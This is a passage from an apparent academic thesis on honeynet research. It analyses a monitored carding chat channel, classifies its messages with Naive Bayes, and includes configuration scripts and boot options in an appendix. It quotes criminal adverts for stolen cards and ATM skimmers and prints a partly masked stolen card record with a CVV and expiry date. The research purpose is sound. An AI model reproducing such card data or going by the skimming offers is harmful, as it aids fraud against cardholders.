labeled data, even though these pieces of information may facilitate any kind of identity
theft (cmp. also McCarty, 2003). An overview of typical messages that we have
captured during the observation period is given in Listing 5.18.
Credit Card Number : 52xxxx1733xxxx3x
CVV                : 761
Expiry Date        : 06/10
Name               : Eurie <...>
Address            : <...> Ave Apt 3
ZIP                : <...>
State              : Texas
Country            : United States
Phone Number       : <...>
Email Address      : <...>@msn.com
Listing 5.17: Example of a Full Personal Record
"Sell Fresh Full Info & Cvv2 (AU, CA, UK, US, IT, SP, EU) (...)"
"SELLING CANADIAN ID’S, Be anyone you WANT! Great for WU Pickups (...)"

"Need Valid US Cvv2 & Full info (...) Msg. me Ready to Deal A.S.A.P!!!"
Listing 5.18: Sample Advertisements and Requests for Personal Data
5.4.2.6 Equipment-Related Offers and Requests
The hardware equipment which is needed to retrieve credit card-related information was
also offered for sale in the communication channel we have monitored. In particular,
blackhats advertised so-called skimmers as well as cameras for automated teller machines (ATMs) to secretly record the PIN and the respective carding data when a victim
withdraws money from her account. The latter may then be processed by an MSR-206
magnetic card writer that creates a new, valid duplicate. Prices for such devices varied
between $400 and $600 in the channel.
Two typical product advertisements and a request that we observed
are shown in Listing 5.19.
"Selling ATM SKIMMER + MSR206 with 5 blank magnetic cards (...)"
"ATM Skimmers, Cameras, MSR206, Readers, etc. for sale (...)"

"LOOKING FOR MSR 206 / MSG FOR MORE INFO."
Listing 5.19: Sample Advertisements and Requests for Hardware Equipment
5.4.3 Classification of the Entire Text Corpora
As we have outlined, with the help of the manually labeled data, we were able to classify
more than four fifths of the entire text corpus. In order to assess the remaining messages
that we have captured in the channel during the observation period, we use statistical
machine learning techniques that automatically associate each post with a meaningful
descriptor. Thereby, we are able to split the text corpus into different message categories
and can roughly estimate the number of advertisements for hacking-related goods and
services, corresponding requests, and other types of posts. Examples of the latter
are recorded conversations between two adversaries that may or may not be directly
related to the underground economy.
Figure 5.30: Process of a Machine Learning-Based Text Classification
Machine learning-based text classifications have already proven useful in the past for
analyzing monitored IRC communications (see Franklin and Paxson, 2007; Elnahrawy,
2002; Mazzariello, 2008). Generally, the classification process is twofold (cmp. Sebastiani, 2002; Manning et al., 2008): In the first step, various example documents are
passed as training data to a classification software. The training data are required to
“learn” the prevailing characteristics of the categories of interest and build an apposite
statistical model. On the basis of this model, new, unknown documents may then be
properly classified in the second step. An overview of the operations is given in
Figure 5.30.
Category | Precision Value | Recall Value
Advertisements for Hacking-Related Goods and Services | 92.13% | 75.73%
Requests for Hacking-Related Goods and Services | 82.13% | 73.28%
Other Types of Posts | 54.71% | 90.80%
Table 5.10: Average Precision and Recall Values of the Training Data
For our purposes, we run the statistical classification software rainbow that was developed by Andrew McCallum.41 It implements several different classification algorithms
and approaches, e.g., the probabilistic Naive Bayes approach which is chosen by default
and is considered to be “one of the most efficient and effective inductive learning algorithms for machine learning” (see Zhang, 2004). Alternatively, example-based classifiers
such as the k-nearest neighbor (KNN) or linear support vector machines (SVMs) may
be applied for the text classification task as well. The latter are described in detail by
Joachims (2002) but are not taken into consideration in our case.
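To illustrate the principle of a probabilistic Naive Bayes text classification, the following Python sketch implements a small multinomial variant with add-one smoothing. It is not the rainbow implementation and makes no claim about its internals; the class name, the whitespace tokenizer, and the toy training messages (loosely modeled on the listings in Section 5.4.2) are our own assumptions.

```python
import math
from collections import Counter, defaultdict

# Hypothetical toy training data; the real training set is not reproduced here.
TRAINING_EXAMPLES = [
    ("selling fresh cvv2 and paypal accounts", "offer"),
    ("selling botnets for reasonable prices", "offer"),
    ("buying all valid cc visa or mastercard", "request"),
    ("looking for a wu confirmer", "request"),
    ("hello how are you today", "other"),
    ("anyone seen him around lately", "other"),
]


class NaiveBayesTextClassifier:
    """Multinomial Naive Bayes with add-one (Laplace) smoothing."""

    def __init__(self):
        self.class_doc_counts = Counter()        # messages seen per category
        self.word_counts = defaultdict(Counter)  # token counts per category
        self.vocabulary = set()

    @staticmethod
    def tokenize(text):
        # Simplistic assumption: lower-case and split on whitespace.
        return text.lower().split()

    def train(self, labeled_messages):
        for text, label in labeled_messages:
            self.class_doc_counts[label] += 1
            for token in self.tokenize(text):
                self.word_counts[label][token] += 1
                self.vocabulary.add(token)

    def classify(self, text):
        """Return the most probable category, or None if untrained."""
        total_docs = sum(self.class_doc_counts.values())
        vocab_size = len(self.vocabulary)
        tokens = [t for t in self.tokenize(text) if t in self.vocabulary]
        best_label, best_score = None, -math.inf
        for label, doc_count in self.class_doc_counts.items():
            # Log prior of the category plus log likelihood of each known token.
            score = math.log(doc_count / total_docs)
            total_words = sum(self.word_counts[label].values())
            for token in tokens:
                count = self.word_counts[label][token]
                score += math.log((count + 1) / (total_words + vocab_size))
            if score > best_score:
                best_label, best_score = label, score
        return best_label
```

Tokens that never occurred in the training data are ignored in this sketch, since they carry no information about any category.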
Regarding the first, learning-oriented phase, we train the rainbow package with a
number of pre-selected example messages for each of our categories. We then check the
robustness of the generated model in 5 test trials: In each trial, we randomly select 20%
of the training data for testing and calculate both the precision and recall values. The
precision and recall values determine the effectiveness of a classification operation and
are defined as (cmp. Sebastiani, 2002):
\[ \text{Precision} = \frac{\text{Number of Correct Positives}}{\text{Number of Predicted Positives}} \tag{5.1} \]
\[ \text{Recall} = \frac{\text{Number of Correct Positives}}{\text{Number of Actual Positives}} \tag{5.2} \]
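The two measures, together with a random 20% hold-out as used in the test trials, can be sketched in Python as follows. The function names and the convention of returning 0.0 for an empty denominator are assumptions made for this illustration only.

```python
import random


def holdout_split(labeled_items, test_fraction=0.2, seed=None):
    """Randomly split labeled items into (training part, test part)."""
    shuffled = list(labeled_items)
    random.Random(seed).shuffle(shuffled)
    cut = int(len(shuffled) * test_fraction)
    return shuffled[cut:], shuffled[:cut]


def precision_recall(actual, predicted, category):
    """Compute precision (5.1) and recall (5.2) for one category.

    `actual` and `predicted` are equally long sequences of labels.
    """
    correct = sum(1 for a, p in zip(actual, predicted)
                  if a == category and p == category)
    predicted_positives = sum(1 for p in predicted if p == category)
    actual_positives = sum(1 for a in actual if a == category)
    # Assumption: report 0.0 when a denominator is zero.
    precision = correct / predicted_positives if predicted_positives else 0.0
    recall = correct / actual_positives if actual_positives else 0.0
    return precision, recall
```

For example, if one of two posts predicted as requests is an actual request and no actual request is missed, the precision is 0.5 and the recall is 1.0.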
The final scores for the different categories after the five test trials are listed in Table 5.10. As can be seen, both the randomly selected example advertisements as well
as the corresponding requests are classified quite well. In contrast, chat-related
types of messages, unfortunately, only attain a mediocre precision, which is likely caused
by a lack of good sample data. Since our research focus is set on the first two categories, however, our model appears to be sufficiently robust to categorize the entire text
corpus.
To carry out the classification task efficiently, we develop a simple client for the rainbow package that passes the 676,084 messages, one at a time, to the software. With the
help of the client, we are able to complete the categorization within a short amount of
time. The results of the operation are illustrated in Figure 5.31: We estimate that more than
95% of all captured messages either offer or request hacking-related goods and services,
with offers outnumbering requests more than 5 to 1. In turn, conversations between adversaries and other, non-categorized types of posts cover only about 4.8% of
the text corpus and, thus, only play a minor role in an analysis of the communication
channel.
Figure 5.31: Estimated Distribution of Offers and Requests in the Text Corpora
41 see http://www.cs.cmu.edu/~mccallum/bow/rainbow/
5.4.4 Noticeable Characteristics of the Underground Market
In the remainder of this section, we briefly illustrate various characteristics that we
find noteworthy for the underground market we have observed. First, the market is
subject to high fluctuation: 64.54% of the 1,345 unique nicks we have measured during
the observation period stayed on the channel for only one day. Furthermore, as
indicated by the cumulative distribution function displayed in Figure 5.32, in more than
95% of all cases, the active lifetime of a nick was less than a week, and only a small
core of 36 nicks remained active for 10 days or more.42
Possible reasons for this distribution may be among the following but still need to be
researched more closely in the future:
• A large group of users either complete their transactions within a short amount
of time, or they quickly leave the channel because their expectations are not sufficiently met, alternative channels are more promising, or they generally lack
real interest in the underground economy.
• A small number of users appear to be seriously intrigued with the market activities.
These core users presumably show a high involvement in the underground economy,
strive for strong (business) relationships with other Internet miscreants, and seek
to maximize their profit margins in the long term (see also Franklin and Paxson,
2007).
Figure 5.32: Active Lifetime of Nicks in the Communication Channel
42 The active lifetime of a nick indicates the total number of days on which a nick has actively participated in
the underground market, i.e., has posted at least one message to the channel.
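The active lifetime of a nick, i.e., the number of distinct days on which it posted at least one message, can be derived from the recorded posts as sketched below. The input format of (nick, date) pairs and the function names are hypothetical and chosen for illustration only.

```python
from collections import defaultdict
from datetime import date


def active_lifetimes(posts):
    """Map each nick to the number of distinct days with at least one post.

    `posts` is an iterable of (nick, day) pairs, one pair per message.
    """
    days_by_nick = defaultdict(set)
    for nick, day in posts:
        days_by_nick[nick].add(day)
    return {nick: len(days) for nick, days in days_by_nick.items()}


def share_active_at_most(lifetimes, max_days):
    """Return the share of nicks whose active lifetime is at most `max_days`."""
    if not lifetimes:
        return 0.0
    short_lived = sum(1 for days in lifetimes.values() if days <= max_days)
    return short_lived / len(lifetimes)
```

Evaluating the second function for increasing values of `max_days` yields the points of a cumulative distribution as plotted in Figure 5.32.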
Apart from the high fluctuation, other prevailing characteristics of the underground
market are a high level of uncertainty and, as Franklin and Paxson (2007) term it, a “culture of dishonesty and distrust”: Many participants appear to be constantly concerned
about “getting ripped”, i.e., falling prey to fraud, as the extracts shown in Listing 5.20
suggest.
"HAVE VIRGIN USA SKIMMED DUMPS FOR SHOPPING (...)
RIPPERS DON’T WASTE MY TIME!
CONTACT ME ONLY IF YOU’RE FOR REAL."

"CASHING CANADIAN DUMPS, 50/50 Share,
No Rippers! Serious People Only!"

"Selling EU dumps with pin [ track1 / track2 ] (...)
NO KIDS, NO TESTS, NO RIPPERS....
IF YOU WASTE MY TIME I WILL IGNORE YOU!!! (...)"
Listing 5.20: Sample Messages Indicating Distrust in Other Market Participants
In case a fraudulent operation is detected, the victim usually posts a warning message
for other users to the channel, and the “ripper” is excluded from the market. Similar
observations are also reported by Thomas and Martin (2006). As pointed out by Franklin
and Paxson (2007, p. 13), however, these warning mechanisms may also be turned against
the underground community to bring about a “marked decrease in the number of successful
transactions”: In a so-called slander attack, the reputation of honest sellers is systematically
destroyed through false accusations. The authors argue that quality sellers are thus driven
out of the market as they increasingly lose their customer base and are unable to maintain
their price level (cmp. also Akerlof, 1970). In the long term, a lemon market situation is
created, buyers cannot reliably distinguish the quality of goods and services any longer,
and the respective economy eventually collapses. As Franklin and Paxson (2007, p. 13)
conclude, this is “a desired outcome”.
5.5 Summary
In this chapter, we have outlined the implementation, deployment, and analysis process
for a honeynet setup with three electronic baits. Our decoys were based on both Microsoft Windows and Linux operating systems. We have installed various services and
applications that were intentionally configured insecurely or contained well-known vulnerabilities. To mitigate risks for external third parties as best as possible in case of an
intrusion, we have deployed the Honeywall, an observation and filtering gateway device
that is capable of controlling traffic going to or coming from the individual honeypots.
We have also introduced several tools and applications that greatly support security
professionals when capturing and analyzing malicious activities.
In the course of the thesis, we have witnessed a large number of penetration attempts
from all over the world. We gave a brief overview of the collected data and illustrated
typical threats and attack patterns. Two system compromises were presented in detail.
We have examined the tools and tactics of the different intruders and developed basic
profiles to determine their motives more accurately. We were also able to monitor a
communication channel that was extensively used by adversaries. The results of these
observations helped gain insight into the hacking community and reveal some kind of
underground economy.
In the previous chapters, we have presented concepts and applications of current honeypot and honeynet technologies. A honeypot, as “an information system resource whose
value lies in unauthorized or illicit use of that resource” (see Spitzner, 2003a), implements specific features such as a number of known security weaknesses that make it
particularly appealing to adversaries. It serves as an electronic bait and helps security professionals collect extensive information about intruders. When multiple decoys
are grouped into a honeynet, malicious activities can even be watched across an entire
network segment. With the bootable Live CD we have developed in the course of this
thesis, such a honeynet may be deployed within a short amount of time. The CD is
completely executed in memory and sets up an instance of the nepenthes honeypot in
a secured environment. Nepenthes emulates various vulnerabilities that are frequently
exploited by common types of self-spreading malware and permits capturing worms and
computer viruses on a large scale. Thereby, we are able to efficiently assess the level of
threat on the Internet.
In the second part of this thesis, we have watched human attackers within a honeynet
of three decoys running Microsoft Windows- and Linux-based operating systems. These
machines were constantly probed throughout the observation period. Two of the attacks
were particularly interesting: In one case, an adversary compromised a misconfigured
database management program and started uploading copyright-protected media. In a
different attack, a black hat connected to several underground communication channels
after our system had been penetrated. We were able to monitor these channels using
utilities that were published by the Honeynet Project. After investigating the recorded
text messages, we found evidence of a lively trade in stolen credit card numbers and
other confidential data.
In summary, honeypots and honeynets offer a systematic approach to come to a deeper
understanding of adversaries and learn more about their tools, tactics, and motives. By
watching the steps of intruders, we are able to collect empirical data and shed light on an
Internet community which is frequently misunderstood and misperceived (cmp. Rogers,
2000a; Fötinger and Ziegler, 2004). These pro-active measures complement traditional,
more defense-oriented fields of IT security. Furthermore, as electronic baits evolve and
get more sophisticated, attackers will possibly be forced to react and start developing
countermeasures in order to evade detection. Basic techniques have already been described by Corey (2003) and Corey (2004); other approaches have been demonstrated
by Dornseif et al. (2004a) and Holz and Raynal (2005b) (cmp. Chapter 2). As Lance
Spitzner points out, this is “a good indication that this technology has started to make
a difference; (...) We are now making the attackers react to us; it’s one of the few ways
we can take the initiative back” (see Honeynet Project, 2004b, p. 683).
However, it is also important to note that honeynet research suffers from specific
inherent problems and faces certain limitations at the time of this writing. First, some
of the major monitoring tools are still quite immature. For example, the Sebek keystroke
logging utility turned out to be incompatible with recent versions of Microsoft Windows
operating systems and caused regular system crashes. Furthermore, some data capture
components of the Honeywall periodically stopped working1 and led to inconsistent
data sources. The latter types of flaws were usually quickly fixed by participants of the
Honeynet Project though.
In addition, there appears to be a tendency for honeynet setups to attract mostly automated
attacks and low-skilled intruders (see Honeynet Project, 2004b). In the course of our
thesis, we have not witnessed any advanced or even new threats. Unfortunately, we
did not see any system compromises due to exploit code either. On the other hand,
many attackers initiated connections over encrypted communication channels whenever
possible. Similar findings are reported by other security professionals as well (cmp.
Honeynet Project, 2004b, p. 39, 58-59). Therefore, data capture as well as data analysis
applications must be adapted to keep up with adversaries in the future. Last but not
least, legal implications of honeynet architectures have not been sufficiently evaluated
yet. For instance, luring a black hat into a trap may fall in the scope of specific privacy- and entrapment-related acts (cmp. Spitzner, 2003d). To the best knowledge of the
author, existing literature is focused on US law to date. Thus, deploying electronic baits
in other countries remains a legal gray area.
Taking the different aspects into consideration, we find several areas of interest that
are worth studying in more detail. These opportunities for future research are briefly
illustrated below.
Opportunities for Future Research
In this thesis, we have concentrated on capturing and analyzing server-related malicious
activities. This approach is effective for estimating the level of threat for common
systems and services deployed on the Internet today. However, as Provos and Holz (2007)
point out, there is a growing trend of attackers exploiting security weaknesses
in typical user applications such as web browsers or email programs. For this reason,
many authors suggest developing client-side honeypots that actively scan web sites, chat
rooms, and peer-to-peer (P2P) networks for malicious content (see Seifert et al., 2006;
Danford, 2006; Ikinci et al., 2008). These types of honeypots may also be capable
of capturing 0-day exploits and other new attack techniques that are still unknown to the
security community (cf. Feinstein and Peck, 2007). Preliminary findings in
this area are promising (see Wang et al., 2005).
Footnote 1: For more information, please see the discussion on the mailing list of the
Honeynet Project, https://public.honeynet.org/mailman/listinfo
In addition, as members of the Honeynet Project (2004b) state, almost all honeynets
are set up on external networks. Thus, there is a lack of empirical data regarding
attacks by insiders, even though this group may cause severe damage, particularly in a
business-oriented environment (cf. Rogers, 2005). Technically sophisticated production
honeypots may help reveal malevolent behavior within organizations and cope with
these risks.
Furthermore, Lance Spitzner argues, “most honeynets have been stand-alone deployments, giving you an isolated picture of threat activity” (see Honeynet Project, 2004b,
p. 680). As we have explained in Chapter 3, distributed honeynets may solve these issues,
because data are acquired from multiple sources. However, publicly available research
results in this field are quite limited at the time of this writing (see Watson, 2007) and
still need to be assessed in more detail in the future.
Last but not least, we feel that psychological aspects of computer crime are still
inadequately covered in the literature, even though, according to Max Kilger, “an
understanding of the blackhat community is equally as important as an understanding of the
technical tools used to discover their exploits” (see Honeynet Project, 2004b, p. 506).
In recent years, various authors have attempted to develop statistically valid models of
adversaries (cf. Rogers, 2000a, 2005; Chantler, 1995; Woo, 2003; Fötinger and Ziegler,
2004). If we succeed in observing more advanced and sophisticated attackers, honeynets
may well contribute to these activities.
A Configuration Script for the Nepenthes Honeypot
The behavior and appearance of the nepenthes low-interaction honeypot can be adapted
quickly and conveniently with the graphical configuration interface that is implemented
on the Live CD (see Section 4.3.3.2). The interface is technically based on a custom
shell script which makes ample use of the dialog package by Vincent Stemen as well as
the awk and sed text processing utilities.
In the following listing, an extract of the shell script is shown. The main configuration
file nepenthes.conf is read in, and the list of nepenthes vulnerability modules is
extracted with the help of specially crafted regular expressions (cf. Lines 12 to 20).
This list is displayed in a new module selection window in the next step as indicated in
Lines 24 to 27 of Listing A.1. By selecting a certain item, the user may then
interactively enable or disable the respective component of the honeypot. After all changes
have been made, the program settings are updated and come into effect once the decoy
is restarted (see Lines 32 to 66).
 1  #!/bin/sh
 2
 3  tempfile=`tempfile 2>/dev/null` || tempfile=/tmp/conf$$
 4  trap "rm -f $tempfile" 0 1 2 5 15
 5
 6  # name of the nepenthes main configuration file
 7  NEPENTHES_CONFIG_FILE="(...)/etc/nepenthes/nepenthes.conf"
 8  ...
 9
10  # read in the nepenthes configuration file, and extract the names of
11  # the vulnerability modules
12  awk '/vuln.*\.so/{
13      total+=1;
14
15      # check if the module is disabled, i.e., is commented out
16      if ($1~/\/\//)
17          print $2 " " total " off\n";
18      else
19          print $2 " " total " on\n"
20  }' $NEPENTHES_CONFIG_FILE > $tempfile
21
22  data=`cat $tempfile`
23
24  # display the module selection window
25  _vuln=$(/usr/bin/dialog --stdout --clear \
26      --backtitle "(...)" --title "Configure Vulnerability Modules" \
27      --checklist "\nPlease select the vulnerability modules you would like to enable at startup.\n" 0 0 10 $data)
28
29  ...
30
31  # save the new system settings
32  awk 'BEGIN{
33      # get the names of the selected modules
34      for (x=1; x<ARGC-2; x++) {
35          vuln[x-1]=ARGV[x];
36          delete ARGV[x]
37      }
38  }/vuln.*\.so/{
39      found=0
40
41      # activate the selected modules in the configuration file
42      for (module in vuln) {
43          if ($0~vuln[module]) {
44              found=1;
45
46              # to activate a specific module in the configuration file,
47              # priorly existing comment characters must be removed
48              if (($0~/\/\//)) {
49                  ...
50                  sub("//","",$0)
51
52                  # update the configuration file
53                  system("sed -e s\47/" config_entry "/" $0 "/\47 " ARGV[ARGC-1] " > " ARGV[ARGC-2] " && cp " ARGV[ARGC-2] " " ARGV[ARGC-1])
54              }
55              break
56
57          }
58
59      }
60
61      # to deactivate a specific module in the configuration file,
62      # the respective entry must be commented out
63      if ((found==0) && (!($0~/\/\//))) {
64          system("sed -e s\47/" $0 "/\\/\\/" $0 "/\47 " ARGV[ARGC-1] " > " ARGV[ARGC-2] " && cp " ARGV[ARGC-2] " " ARGV[ARGC-1])
65      }
66  }' $_vuln $tempfile $NEPENTHES_CONFIG_FILE
Listing A.1: Extract of the Configuration Script for the nepenthes Honeypot
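The two awk passes of the listing (reading the module states and writing them back) can be
approximated by the following minimal sketch. It is not the script shipped on the Live CD:
the assumed file layout (one module entry per line, disabled entries prefixed with //), the
helper names list_modules and set_module, and the use of mktemp are illustrative
assumptions only.

```sh
#!/bin/sh
# Minimal sketch; the file layout and helper names are assumptions,
# not taken from the Live CD script.

# Print "<module> <index> <on|off>" for every vulnerability module entry.
list_modules() {  # usage: list_modules FILE
    awk '/vuln.*\.so/ {
        total += 1
        line = $0
        sub(/^[ \t]+/, "", line)                       # drop indentation
        state = sub(/^\/\/[ \t]*/, "", line) ? "off" : "on"
        split(line, field, /[ \t]+/)                   # field[1] holds the module name
        name = field[1]
        gsub(/[",]/, "", name)                         # strip quotes and commas
        print name, total, state
    }' "$1"
}

# Enable or disable one module by removing or adding the // comment marker.
set_module() {  # usage: set_module FILE MODULE on|off
    tmp=$(mktemp) || return 1
    awk -v mod="$2" -v state="$3" '
        index($0, "\"" mod "\"") {
            sub(/^[ \t]*\/\/[ \t]*/, "")               # remove an existing marker
            if (state == "off") $0 = "// " $0          # add it again to disable
        }
        { print }
    ' "$1" > "$tmp" && cp "$tmp" "$1"
    rm -f "$tmp"
}

# Demonstration on a hypothetical configuration extract.
conf=$(mktemp) || exit 1
cat > "$conf" <<'EOF'
"vulnasn1.so",     "vuln-asn1.conf",   ""
// "vulnbagle.so", "vuln-bagle.conf",  ""
EOF
set_module "$conf" vulnbagle.so on
set_module "$conf" vulnasn1.so off
list_modules "$conf"
rm -f "$conf"
```

In this demonstration, the first entry ends up disabled and the second one enabled, so the
final call reports vulnasn1.so as off and vulnbagle.so as on. Unlike the original extract,
the sketch rewrites the file in a single awk pass instead of spawning sed for every entry,
which avoids quoting problems when an entry contains characters that are special to sed.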
When the Live CD is launched, the user may invoke the Isolinux boot loader with
different boot options (see Section 4.3.3.4). These options are passed to the system
kernel in order to change specific, runtime-related aspects of the operating system. For
instance, it is possible to disable certain hardware devices or adapt the default video
mode. Such customizations are particularly useful in case the machine stalls or even
unexpectedly crashes during the startup phase.
A brief description of the most important boot options is shown in Table B.1; a more
detailed reference is available from the Linux Kernel Organization (2009). To take effect,
the individual options must be added to the APPEND section of the respective boot label.
Boot Option           Description

vga=<...>             Changes the default video mode. Thereby, the CD can be run on systems
                      with limited screen resolution capabilities. In order to switch to
                      another mode, a so-called VESA (Video Electronics Standards
                      Association) mode number must be entered. An overview of valid mode
                      numbers is given by Knorr (2009).

acpi=off              Disables specific autodetection routines for hardware devices, e.g.,
nohotplug             memory or video cards. These options are recommended in case the
nopcmcia              system stalls during the boot process.
noagp

nodma                 Disables the Direct Memory Access (DMA) mode for hardware devices.

noauto                Hardware drives such as disks or CD-ROM drives are not automatically
nohd                  mounted during the boot process. In order to access a specific disk
nocd                  or drive, it has to be manually mounted during runtime.

from=<...>            Loads the Live CD from a specific drive or path. For example, the
                      option from=/dev/hda1 invokes the CD from the first hard drive.

root=<...>            Specifies the root device. In the case of the Live CD, the initial
                      ram disk /dev/ram0 is mounted as root (see also Almesberger and
                      Lermen, 2000).

passwd=<...>          Sets the system password for the root superuser account to a specific
                      string. In case the option is set to passwd=ask, the user is prompted
                      to set a new password during the boot process.

changes=<...>         Changes made at runtime are persistently stored to a specific file or
                      drive. Thereby, no data are lost if the system is shut down or
                      rebooted.

toram                 All files are copied to memory. Although this may consume large
copy2ram              portions of space and slow down the boot process, operations at
                      runtime may be significantly accelerated.

ramdisk_size=<...>    Sets the size of the initial ram disk which serves as a temporary
                      root file system during the boot process of the operating system.
                      The default size of the disk is 4096 kB (see Gortmaker, 2004).

load=module           Loads a specific file system module when booting the CD. In case the
                      noload=<module> option is set, a certain module may be excluded from
                      the boot process.

debug                 Enables the debug mode during the boot process and reports the status
                      of specific internal operations.

autoexec=<...>        Executes a pre-defined command instead of displaying the default
                      login manager. For instance, to automatically invoke the X Window
                      System and skip the authentication procedure, the option must be set
                      to autoexec=startx.
Table B.1: Important Boot Options of the Live CD
(Source: Based on Matejicek, 2008a; Linux Kernel Organization, 2009)
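As a hedged illustration of how an option from Table B.1 ends up in the APPEND section of a
boot label, the following sketch appends one option to a sample boot configuration. The
label name livecd, the kernel and initrd paths, and the helper name add_boot_option are
assumptions made for this example; they are not taken from the Live CD itself.

```sh
#!/bin/sh
# Minimal sketch; label, paths, and helper name are hypothetical.

# Print FILE with OPTION appended to the APPEND line of the given boot label.
add_boot_option() {  # usage: add_boot_option FILE LABEL OPTION
    awk -v label="$2" -v opt="$3" '
        toupper($1) == "LABEL"                      { current = $2 }
        toupper($1) == "APPEND" && current == label { $0 = $0 " " opt }
        { print }
    ' "$1"
}

# Demonstration on a hypothetical boot configuration.
cfg=$(mktemp) || exit 1
cat > "$cfg" <<'EOF'
LABEL livecd
KERNEL /boot/vmlinuz
APPEND initrd=/boot/initrd.gz ramdisk_size=4096 root=/dev/ram0 rw
EOF
add_boot_option "$cfg" livecd "acpi=off"
rm -f "$cfg"
```

The function writes the modified configuration to standard output and leaves the input file
untouched, so the result can be inspected before it replaces the original. Only the APPEND
line that belongs to the requested label is changed; other boot labels keep their options.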
References
[Ajzen 1991] Ajzen, Icek: The Theory of Planned Behavior. In: Organizational Behavior
and Human Decision Processes 2 (1991), No. 50, p. 179–211
[Akerlof 1970] Akerlof, George A.: The Market for “Lemons”: Quality Uncertainty
and the Market Mechanism. In: The Quarterly Journal of Economics 84 (1970), No. 3,
p. 488–500
[Aleph One 1996] Aleph One: Smashing the Stack for Fun and Profit. In: Phrack
Magazine 49 (1996), No. 14
[Almesberger and Lermen 2000] Almesberger, Werner ; Lermen, Hans: Using
the Initial RAM Disk (initrd). Published: 2000. http://www.kernel.org/doc/
Documentation/initrd.txt, Retrieved: August 11, 2009
[Andrews and Whittaker 2006] Andrews, Mike ; Whittaker, James A.: How to
Break Web Software. Addison Wesley, 2006
[Antonomasia 2003] Antonomasia: Additional Logging for Honeypots. Published:
2003. http://www.notatla.org.uk/SOFTWARE/honeypot_code_description.html,
Retrieved: August 11, 2009
[Bächer et al. 2008] Bächer, Paul ; Holz, Thorsten ; Kötter, Markus ; Wicherski,
Georg: Know your Enemy: Tracking Botnets. Published: October 2008. http:
//honeynet.org/papers/bots/, Retrieved: August 11, 2009
[Bächer et al. 2006] Bächer, Paul ; Kötter, Markus ; Holz, Thorsten ; Dornseif,
Maximillian ; Freiling, Felix: The Nepenthes Platform: An Efficient Approach to
Collect Malware. In: 9th International Symposium on Recent Advances in Intrusion
Detection, 2006
[Balas and Viecco 2005] Balas, Edward ; Viecco, Cimo: Towards a Third Generation Data Capture Architecture for Honeynets. In: Proceedings of the 6th IEEE
Information Assurance Workshop, 2005, p. 21–28
[Baldwin 2002a] Baldwin, Lawrence: Pubstro Forensics. Published: September 2002.
http://www.mynetwatchman.com/kb/security/articles/winforensics/index.htm,
Retrieved: August 11, 2009
[Baldwin 2002b] Baldwin, Lawrence ; myNetWatchman (Editor): Windows Messenger Delivery Options: SMB vs. MS RPC. Published: November 2002. http:
//www.mynetwatchman.com/kb/security/articles/popupspam/netsend.htm, Retrieved: August 11, 2009
[Baldwin 2003] Baldwin, Lawrence: myNetWatchman Alert - Windows PopUP SPAM.
Published: September 2003. http://www.mynetwatchman.com/kb/security/articles/popupspam/,
Retrieved: August 11, 2009
[Barford et al. 2002] Barford, Paul ; Kline, Jeffery ; Plonka, David ; Ron, Amos:
A Signal Analysis of Network Traffic Anomalies. In: Proceedings of the 2nd ACM
SIGCOMM Workshop on Internet Measurement, 2002
[Bastian 2004] Bastian, Waldo: The KDE User Guide. Published: June 2004. http:
//docs.kde.org/development/en/kdebase-runtime/userguide/index.html, Retrieved: August 11, 2009
[Bauer 2001] Bauer, Mick: Swatch: Automated Log Monitoring for the Vigilant
but Lazy. Published: 2001. http://www.linuxjournal.com/article/4776, Retrieved: August 11, 2009
[Bernstein 1996] Bernstein, Daniel J.: SYN Cookies. Published: 1996. http://cr.
yp.to/syncookies.html, Retrieved: August 11, 2009
[Bernstein 2005] Bernstein, Daniel J.: Cache-Timing Attacks on AES. Published:
2005. http://cr.yp.to/antiforgery/cachetiming-20050414.pdf, Retrieved: August 11, 2009
[Brand 2007] Brand, Nicholas: The LiveCD List. Published: 2007. http://www.
livecdlist.com/, Retrieved: August 11, 2009
[Brockmeier 2001] Brockmeier, Joe ; IBM DeveloperWorks (Editor): Slackware Linux 101 - A Look at what Happens when You Boot Your Linux Box.
Published: March 2001. http://www.ibm.com/developerworks/linux/library/
l-slack.html, Retrieved: August 11, 2009
[Brohan 2009] Brohan, Mark: The Top 500 Guide. Published: June 2009. http:
//www.internetretailer.com/article.asp?id=30594, Retrieved: August 11, 2009
[Brownlee et al. 1997] Brownlee, Nevil ; Mills, Carl ; Ruth, Gregory R.: RFC: 2063
- Traffic Flow Measurement: Architecture. Published: 1997. http://www.ietf.org/
rfc/rfc2063.txt, Retrieved: August 11, 2009
[Buddenhagen 2007] Buddenhagen, Oswald: The KDM Handbook. Published: December 2007.
http://docs.kde.org/kde3/en/kdebase/kdm/kdm.pdf, Retrieved: August 11, 2009
[Burr 2002] Burr, Simon: How to Break Out of a Chroot() Jail.
Published: 2002. http://www.bpfh.net/simes/computing/chroot-break.html,
[Cameron 2003] Cameron, Jamie: Managing Linux Systems with Webmin - System
Administration and Module Development. Addison Wesley, 2003
[Capgemini 2008] Capgemini (Editor): Studie IT-Trends 2008 (German).
Published: 2008. http://www.at.capgemini.com/m/at/tl/IT-Trends_2008.pdf,
[Carrier 2006] Carrier, Brian D.: Risks of Live Digital Forensic Analysis. In: Communications of the ACM 49 (2006), No. 2, p. 56–61
[Caswell et al. 2007] Caswell, Brian ; Beale, Jay ; Baker, Andrew: Snort Intrusion
Detection and Prevention Toolkit. Syngress Publishing, 2007
[CERT 1996] CERT (Editor): Advisory CA-1996-21 TCP SYN Flooding and IP Spoofing Attacks. Published: 1996. http://www.cert.org/advisories/CA-1996-21.
html, Retrieved: August 11, 2009
[CERT 1998] CERT (Editor): Advisory CA-1998-12 Remotely Exploitable Buffer Overflow Vulnerability in mountd. Published: 1998. http://www.cert.org/advisories/
CA-1998-12.html, Retrieved: August 11, 2009
[CERT 2001a] CERT (Editor): Advisory CA-2001-19 “Code Red” Worm Exploiting
Buffer Overflow In IIS Indexing Service DLL. Published: 2001. http://www.cert.
org/advisories/CA-2001-19.html, Retrieved: August 11, 2009
[CERT 2001b] CERT (Editor): Advisory CA-2001-23 Continued Threat of the “Code
Red” Worm. Published: 2001. http://www.cert.org/advisories/CA-2001-23.
[CERT 2001c] CERT (Editor): Denial of Service Attacks. Published: June 2001. http:
//www.cert.org/tech_tips/denial_of_service.html, Retrieved: August 11, 2009
[CERT 2003a] CERT (Editor): Advisory CA-2003-04 MS-SQL Server Worm.
Published: January 2003. http://www.cert.org/advisories/CA-2003-04.html,
[CERT 2003b] CERT (Editor): Advisory CA-2003-24 Buffer Management Vulnerability
in OpenSSH. Published: 2003. http://www.cert.org/advisories/CA-2003-24.
[CERT 2004] CERT (Editor): Computer Emergency Response Team: Vulnerability
